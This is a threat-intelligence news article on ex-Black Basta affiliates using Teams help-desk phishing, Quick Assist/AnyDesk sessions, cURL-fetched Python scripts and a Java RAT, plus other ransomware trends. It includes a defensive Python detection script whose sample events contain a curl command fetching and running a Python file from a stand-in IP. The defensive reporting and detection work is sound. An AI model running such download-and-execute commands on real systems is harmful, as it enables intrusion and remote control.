Ex-Members of Black Basta Leverage Microsoft Teams and Python Scripts in 2025 Cyber Attacks


Former members associated with the Black Basta ransomware operation have been observed maintaining their established tactics of email bombing and Microsoft Teams phishing to secure persistent access to target networks.

Recently, these attackers have integrated Python script execution into their methodology, utilizing cURL requests to retrieve and deploy malicious payloads. This development indicates a continued evolution and regrouping among threat actors, notwithstanding the significant setbacks that the Black Basta brand faced after a public leak of its internal communications earlier this year.

Reports indicate that half of the Teams phishing attempts recorded between February and May 2025 originated from onmicrosoft[.]com domains, while breached domains accounted for 42% of the attacks in this timeframe. Such approaches are stealthier and enable threat actors to mimic legitimate traffic during their operations.

In recent weeks, organizations in the finance, insurance, and construction sectors have been specifically targeted through Teams phishing attacks, where attackers pose as help desk personnel to deceive unsuspecting individuals.

The shutdown of Black Basta’s data leak site, even as its tactics remain in use, suggests that former affiliates have moved to another Ransomware-as-a-Service (RaaS) group or established a new one. Evidence points towards former members potentially joining the CACTUS RaaS group, as suggested by leaked chats referencing substantial payments to CACTUS.

It’s noteworthy that CACTUS has not identified any organizations on its data leak site since March 2025, which may indicate a strategy to reduce visibility or that the group has disbanded. There is also speculation that affiliates may have aligned with BlackLock, which is thought to be working with the DragonForce ransomware cartel.

Attackers have further exploited access obtained through Teams phishing to initiate remote desktop sessions via Quick Assist and AnyDesk, subsequently downloading and executing malicious Python scripts to facilitate command-and-control communications.
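The chain described above (remote-assist session, then cURL fetching a Python script, then the interpreter running it) is what a defender would correlate in process-creation telemetry. The following is an added detection example, not code from the article or from any vendor report it cites; the log shape, host names, paths and the 60-minute window are constructed assumptions.

```python
# Added example: correlate constructed process-creation events to flag a
# Quick Assist / AnyDesk session followed by cURL fetching a .py file that
# is then executed by Python. Events and field names are constructed, not real telemetry.
from datetime import datetime, timedelta

SAMPLE_EVENTS = [  # constructed sample data
    {"ts": "2025-05-12T09:14:02", "host": "WS-017",
     "image": "C:\\Windows\\System32\\quickassist.exe", "cmd": "quickassist.exe"},
    {"ts": "2025-05-12T09:21:45", "host": "WS-017",
     "image": "C:\\Windows\\System32\\curl.exe",
     "cmd": "curl.exe -s -o C:\\Users\\Public\\update.py http://203.0.113.10/update.py"},
    {"ts": "2025-05-12T09:21:50", "host": "WS-017",
     "image": "C:\\Program Files\\Python312\\python.exe",
     "cmd": "python.exe C:\\Users\\Public\\update.py"},
    {"ts": "2025-05-12T10:02:11", "host": "WS-042",  # benign: no remote-assist session, no .py
     "image": "C:\\Windows\\System32\\curl.exe", "cmd": "curl.exe -O https://example.com/readme.txt"},
]

REMOTE_ASSIST = {"quickassist.exe", "anydesk.exe"}
DOWNLOADERS = {"curl.exe"}
INTERPRETERS = {"python.exe", "python3.exe", "pythonw.exe"}
WINDOW = timedelta(minutes=60)  # assumed correlation window

def _exe(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def find_chains(events, window=WINDOW):
    """Return (host, remote_assist_ts, script_path) for each host where a remote-assist
    process is followed within `window` by a cURL download of a .py and its execution."""
    hits, by_host = [], {}
    for e in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort lexically
        by_host.setdefault(e["host"], []).append(e)
    for host, evs in by_host.items():
        for i, start in enumerate(evs):
            if _exe(start["image"]) not in REMOTE_ASSIST:
                continue
            t0, fetched = datetime.fromisoformat(start["ts"]), set()
            for e in evs[i + 1:]:
                if datetime.fromisoformat(e["ts"]) - t0 > window:
                    break
                name, args = _exe(e["image"]), e["cmd"].lower().split()
                if name in DOWNLOADERS:
                    # local output paths ending in .py (skip the remote URL itself)
                    fetched.update(t for t in args if t.endswith(".py") and not t.startswith("http"))
                elif name in INTERPRETERS:
                    hits.extend((host, start["ts"], t) for t in args if t in fetched)
    return hits

if __name__ == "__main__":
    for hit in find_chains(SAMPLE_EVENTS):
        print("suspicious remote-assist -> curl -> python chain:", hit)
```

A real deployment would feed Sysmon Event ID 1 or EDR process events into `find_chains` and tune the window and tool lists to the environment.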

The deployment of Python scripts in these attacks signals an evolving tactic that is likely to proliferate in forthcoming Teams phishing campaigns.

The strategy of combining email bombing, Teams phishing, and Quick Assist, once characteristic of Black Basta, appears to have been adopted by the BlackSuit ransomware group, indicating potential overlaps or membership shifts between the two groups.

According to Rapid7, initial access through these methods grants an opportunity to download and execute updated variants of a Java-based Remote Access Trojan (RAT) that had been employed previously for credential harvesting in Black Basta operations. This new form of malware leverages cloud-based file hosting services from both Google and Microsoft, facilitating proxy commands through the respective cloud service provider’s infrastructure. Over time, the malware development has transitioned from direct proxy connections to utilizing platforms such as OneDrive and Google Drive.

The latest edition of the malware is designed to enhance capabilities for file transfer between the infected host and external servers, establish SOCKS5 proxy tunnels, harvest credentials stored in web browsers, simulate a fraudulent Windows login interface, and execute Java classes sourced from supplied URLs.

Recent intrusions have also featured a tunneling backdoor known as QDoor, previously linked to BlackSuit, alongside a Rust-based payload serving as a custom loader for the SSH utility, and a Python RAT referred to as Anubis.

Emerging trends in the ransomware landscape include:

– The financially motivated group Scattered Spider has targeted managed service providers (MSPs) and IT vendors, employing a “one-to-many” strategy to breach multiple organizations using a single compromise, including exploiting accounts from Tata Consultancy Services for initial access.
– Scattered Spider has developed fake login pages via the Evilginx phishing framework to circumvent multi-factor authentication (MFA) and has formed strategic partnerships with major ransomware operators, such as ALPHV (BlackCat), RansomHub, and DragonForce, to execute complex attacks against MSPs by exploiting vulnerabilities in SimpleHelp software.
– The Qilin ransomware operators have commenced coordinated attacks targeting several organizations by weaponizing vulnerabilities within Fortinet FortiGate devices.
– The Play ransomware group is believed to have breached approximately 900 entities as of May 2025, utilizing SimpleHelp vulnerabilities following their public disclosure.
– The VanHelsing ransomware group’s source code, including sensitive information and tools, has been leaked, apparently as a result of internal conflicts.
– The Interlock ransomware group has implemented a new JavaScript RAT, NodeSnake, in attacks on local governments and educational institutions within the UK.

Remote Access Trojans (RATs) confer substantial control over compromised systems, enabling attackers to manipulate files, monitor activities, and alter system settings. Such capabilities allow threat actors to maintain persistence within organizations, deploy additional tools, and exfiltrate data as needed.